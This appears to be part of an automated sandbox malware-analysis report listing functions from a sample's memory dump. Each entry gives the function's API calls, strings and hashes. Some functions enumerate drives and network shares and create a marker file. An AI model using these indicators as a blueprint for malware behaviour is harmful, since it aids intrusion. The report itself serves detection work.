                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3567560977-0
                                                                                                  • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                  • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                  • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                  • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0042594A
                                                                                                    • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                    • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                    • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                  • _free.LIBCMT ref: 00425970
                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • __lock.LIBCMT ref: 00425989
                                                                                                  • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                  • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                  • _free.LIBCMT ref: 004259C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID:
                                                                                                  • API String ID: 626533743-0
                                                                                                  • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                  • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                  • API String ID: 601868998-2416195885
                                                                                                  • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                  • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                  • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                  • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                  • API String ID: 2102423945-3653307630
                                                                                                  • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                  • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                  • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                  • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                    • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                    • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                    • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                    • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                    • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                  • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                  Strings
                                                                                                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                  • API String ID: 3123740607-798102604
                                                                                                  • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                  • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fprintf_memset
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                  • API String ID: 3021507156-3399676524
                                                                                                  • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                  • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                  • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                  • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                  • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                  • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                  • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                  • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                  • API String ID: 2944774295-3503800400
                                                                                                  • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                  • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                  • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                  • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                  • _memset.LIBCMT ref: 00410C4C
                                                                                                  • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 364255426-0
                                                                                                  • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                  • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                  • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                  • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                  • _strlen.LIBCMT ref: 00441734
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • _strnlen.LIBCMT ref: 004417BF
                                                                                                  • __lock.LIBCMT ref: 004417D0
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2168648987-0
                                                                                                  • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                  • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                  • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560635915-0
                                                                                                  • Opcode ID: 272f857d4df2e5504fcb7981171f9436a8f1f1fd8613449089b36114f078ca9d
                                                                                                  • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                  • Opcode Fuzzy Hash: 272f857d4df2e5504fcb7981171f9436a8f1f1fd8613449089b36114f078ca9d
                                                                                                  • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0043B70B
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _free.LIBCMT ref: 0043B71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2734353464-0
                                                                                                  • Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                                                                                                  • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                  • Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                                                                                                  • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                  • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                  • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                  • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                  • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                  • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                  • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                  • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                  • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
